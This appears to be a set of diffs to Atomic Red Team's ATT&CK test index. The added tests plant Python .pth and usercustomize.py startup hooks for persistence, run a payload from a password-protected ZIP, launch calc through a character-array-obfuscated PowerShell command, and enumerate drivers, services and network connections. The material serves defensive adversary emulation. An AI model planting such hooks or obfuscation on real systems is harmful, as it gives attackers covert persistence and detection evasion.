+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
  T1037.003:
    technique:
      type: attack-pattern
@@ -55788,7 +56006,35 @@ discovery:
      - Windows
      x_mitre_version: '1.0'
      identifier: T1652
-    atomic_tests: []
+    atomic_tests:
+    - name: Device Driver Discovery (Linux)
+      auto_generated_guid: d57dfc9e-ed9a-418e-88f8-b59c85f8cfd1
+      description: 'Displays a list of loaded kernel modules on a Linux system, which
+        is used to enumerate drivers.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'lsmod
+
+          '
+        name: bash
+        elevation_required: false
+    - name: Enumerate Kernel Driver Files (Linux)
+      auto_generated_guid: 13c0fef5-9be9-4d7f-9c6b-901624e53770
+      description: 'Finds and lists all kernel driver files on a Linux system in order
+        to provide a broader view of available drivers, not just loaded ones.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        command: 'find /lib/modules/$(uname -r)/kernel/drivers -name "*.ko*"
+
+          '
+        name: bash
+        elevation_required: false
  T1087.002:
    technique:
      type: attack-pattern
@@ -56385,6 +56631,21 @@ discovery:

          '
        name: bash
+    - name: System Service Discovery - Linux init scripts
+      auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
+      description: |
+        Enumerates system services by listing SysV init scripts and runlevel
+        symlinks under /etc/init.d and /etc/rc*.d.
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        command: |
+          echo "[*] Listing SysV init scripts (/etc/init.d):"
+          if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
+          echo
+          echo "[*] Listing runlevel directories (/etc/rc*.d):"
+          ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
  T1040:
    technique:
      type: attack-pattern
@@ -58168,6 +58429,21 @@ discovery:
      x_mitre_version: '2.5'
      identifier: T1049
    atomic_tests:
+    - name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
+      auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
+      description: |
+        List active TCP/UDP network connections using ss, with lsof as a fallback
+        when ss is unavailable. Serves as an alternative to the netstat-based test.
+      supported_platforms:
+      - linux
+      - macos
+      executor:
+        name: bash
+        command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
+          -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
+          fi
+
+          '
    - name: System Network Connections Discovery FreeBSD, Linux & MacOS
      auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
      description: |
@@ -58194,6 +58470,19 @@ discovery:
          netstat
          who -a
        name: sh
+    - name: System Network Connections Discovery via sockstat (Linux, FreeBSD)
+      auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
+      description: 'Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
+
+        '
+      supported_platforms:
+      - linux
+      executor:
+        name: sh
+        command: |
+          sockstat -4
+          sockstat -6 2>/dev/null || true
+          sockstat -l 2>/dev/null || true
  T1497:
    technique:
      type: attack-pattern
@@ -1328,7 +1328,6 @@ defense-evasion:
          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
          $bytes = [System.Convert]::FromBase64String($encodedString)
          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
-
          #write the decoded eicar string to file
          $decodedString | Out-File T1027.013_decodedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
@@ -1346,15 +1345,58 @@ defense-evasion:
        command: |-
          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
-
          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
-
          #Write the decrypted eicar string to a file
          $decryptedString | out-file T1027.013_decryptedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
        name: powershell
        elevation_required: false
+    - name: Password-Protected ZIP Payload Extraction and Execution
+      auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
+      description: |
+        Extracts and executes a script from a password-protected ZIP archive.
+        This technique is commonly used by malware families like Emotet and QBot to deliver payloads
+        via email attachments where the password is provided in the message body.
+        The encrypted ZIP evades static file analysis until extracted at runtime.
+        Upon successful execution, displays confirmation and system information.
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        zip_password:
+          description: Password used to protect the ZIP archive
+          type: String
+          default: infected
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'zip and unzip must be installed
+
+          '
+        prereq_command: 'which zip && which unzip
+
+          '
+        get_prereq_command: 'echo "Install zip and unzip using your package manager
+          (apt-get, yum, or brew)"
+
+          '
+      executor:
+        command: |
+          echo '#!/bin/bash' > /tmp/art_payload.sh
+          echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
+          echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
+          echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
+          echo 'uname -a' >> /tmp/art_payload.sh
+          cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
+          rm /tmp/art_payload.sh
+          echo "Encrypted ZIP created. Extracting with password..."
+          unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
+          echo "Executing extracted payload:"
+          bash /tmp/art_payload.sh
+        cleanup_command: |
+          rm -f /tmp/art_payload.sh
+          rm -f /tmp/art_encrypted.zip
+        name: bash
  T1014:
    technique:
      type: attack-pattern
@@ -23078,7 +23120,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -23114,7 +23156,102 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
+      description: 'Creates a Python startup hook using a .pth file inside a virtual
+        environment on macOS.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        exe_name:
+          description: App to launch
+          type: string
+          default: Calculator
+        python_exe:
+          description: The python binary name to test
+          type: string
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
+          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
+          $PYTHON_EXE -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          pkill "#{exe_name}" || true
+          [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
  T1037.003:
    technique:
      type: attack-pattern
@@ -30683,20 +30820,6 @@ persistence:

          3. Click 'Select'
        name: manual
-    - name: Chrome/Chromium (Chrome Web Store)
-      auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
-      description: Install the "Minimum Viable Malicious Extension" Chrome extension
-      supported_platforms:
-      - linux
-      - windows
-      - macos
-      executor:
-        steps: |
-          1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
-          in Chrome
-
-          2. Click 'Add to Chrome'
-        name: manual
    - name: Firefox
      auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
      description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -35615,7 +35738,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -35651,7 +35774,102 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (macOS)
+      auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
+      description: 'Creates a Python startup hook using a .pth file inside a virtual
+        environment on macOS.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        exe_name:
+          description: App to launch
+          type: string
+          default: Calculator
+        python_exe:
+          description: The python binary name to test
+          type: string
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+        prereq_command: |
+          PYTHON_CMD=$(command -v python || command -v #{python_exe})
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
+          (''brew install python'' or ''brew install python3 or brew install python@3.X'')
+          or the macOS developer tools (''xcode-select --install'')."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
+          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
+          $PYTHON_EXE -m venv "$TEMPDIR/env"
+          SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
+          echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
+          "$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
+        cleanup_command: |
+          if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          pkill "#{exe_name}" || true
+          [ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
+          echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
+    - name: Python Startup Hook - usercustomize.py (Linux / MacOS)
+      auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require root privileges.\n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python3
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          if [ -z "$PYTHON_CMD" ]; then exit 1; fi
+          $PYTHON_CMD -m venv --help >/dev/null 2>&1
+        get_prereq_command: 'echo "Python not found. Please install Python using your
+          package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
+          install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
+          -y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
+          brew install python3 or brew install python@3.x or the macOS developer tools
+          (''xcode-select --install''))."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          PYTHON_EXE=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
+          mkdir -p "$USER_PACKAGES"
+          echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
+          if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
+          $PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
+          if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
+        cleanup_command: |
+          PYTHON_CMD=$(command -v #{python_exe} || command -v python)
+          USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
+          if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
+          if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
+          rm -rf /tmp/poc.txt
+          echo "[+] Successful remove poc.txt under /tmp"
  T1037.003:
    technique:
      type: attack-pattern
@@ -51341,7 +51559,34 @@ discovery:
      - Windows
      x_mitre_version: '1.0'
      identifier: T1652
-    atomic_tests: []
+    atomic_tests:
+    - name: List loaded kernel extensions (macOS)
+      auto_generated_guid: 71eab73d-5d7d-4681-9a72-7873489a5b85
+      description: 'Displays a list of loaded kernel extensions (kexts) on a macOS
+        system.
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'kextstat
+
+          '
+        name: bash
+        elevation_required: false
+    - name: Find Kernel Extensions (macOS)
+      auto_generated_guid: c63bbe52-6f17-4832-b221-f07ba8b1736f
+      description: 'Searches for kernel extension (kext) files on a macOS system.
+
+        '
+      supported_platforms:
+      - macos
+      executor:
+        command: 'kextfind
+
+          '
+        name: bash
+        elevation_required: false
  T1087.002:
    technique:
      type: attack-pattern
@@ -51788,7 +52033,17 @@ discovery:
      - Windows
      x_mitre_version: '1.6'
      identifier: T1007
-    atomic_tests: []
+    atomic_tests:
+    - name: System Service Discovery - macOS launchctl
+      auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
+      description: |
+        Enumerates services on macOS using launchctl. Used by adversaries for
+        identifying daemons, background services, and persistence mechanisms.
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: launchctl list
  T1040:
    technique:
      type: attack-pattern
@@ -53334,6 +53589,21 @@ discovery:
      x_mitre_version: '2.5'
      identifier: T1049
    atomic_tests:
+    - name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
+      auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
+      description: |
+        List active TCP/UDP network connections using ss, with lsof as a fallback
+        when ss is unavailable. Serves as an alternative to the netstat-based test.
+      supported_platforms:
+      - linux
+      - macos
+      executor:
+        name: bash
+        command: 'if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss
+          -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true;
+          fi
+
+          '
    - name: System Network Connections Discovery FreeBSD, Linux & MacOS
      auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
      description: |
@@ -20243,7 +20243,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20279,6 +20279,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -31726,7 +31727,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -31762,6 +31763,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -20062,7 +20062,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -20098,6 +20098,7 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -31494,7 +31495,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -31530,6 +31531,7 @@ persistence:
      - macOS
      - Windows
      x_mitre_version: '1.0'
+      identifier: T1546.018
    atomic_tests: []
  T1037.003:
    technique:
@@ -1523,7 +1523,6 @@ defense-evasion:
          $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
          $bytes = [System.Convert]::FromBase64String($encodedString)
          $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
-
          #write the decoded eicar string to file
          $decodedString | Out-File T1027.013_decodedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
@@ -1541,10 +1540,8 @@ defense-evasion:
        command: |-
          $encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
          $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
-
          $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
          $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
-
          #Write the decrypted eicar string to a file
          $decryptedString | out-file T1027.013_decryptedEicar.txt
        cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
@@ -19688,6 +19685,22 @@ defense-evasion:

          '
        name: command_prompt
+    - name: Obfuscated PowerShell Command via Character Array
+      auto_generated_guid: 6683baf0-6e77-4f58-b114-814184ea8150
+      description: "Spawns a child PowerShell process using character array obfuscation.
+        \nBoth the PowerShell binary name and executed command are constructed \nfrom
+        ASCII values at runtime to evade string-based detection.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $ps = [char[]](112,111,119,101,114,115,104,101,108,108)
+          $cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
+          & (-join $ps) "-Command" (-join $cmd)
+        cleanup_command: |
+          taskkill /f /im calculator.exe >nul 2>nul
+          taskkill /f /im CalculatorApp.exe >nul 2>nul
+        name: powershell
  T1556.006:
    technique:
      type: attack-pattern
@@ -38012,7 +38025,7 @@ privilege-escalation:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-21T02:35:20.850Z'
-      name: Python Startup Hooks
+      name: 'Event Triggered Execution: Python Startup Hooks'
      description: "Adversaries may achieve persistence by leveraging Python’s startup
        mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
        or `usercustomize.py` modules. These files are automatically processed during
@@ -38048,7 +38061,99 @@ privilege-escalation:
      - macOS
      - Windows
      x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1546.018
+    atomic_tests:
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        python_exe:
+          description: The python binary name to test.
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
+
+          '
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
+          $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
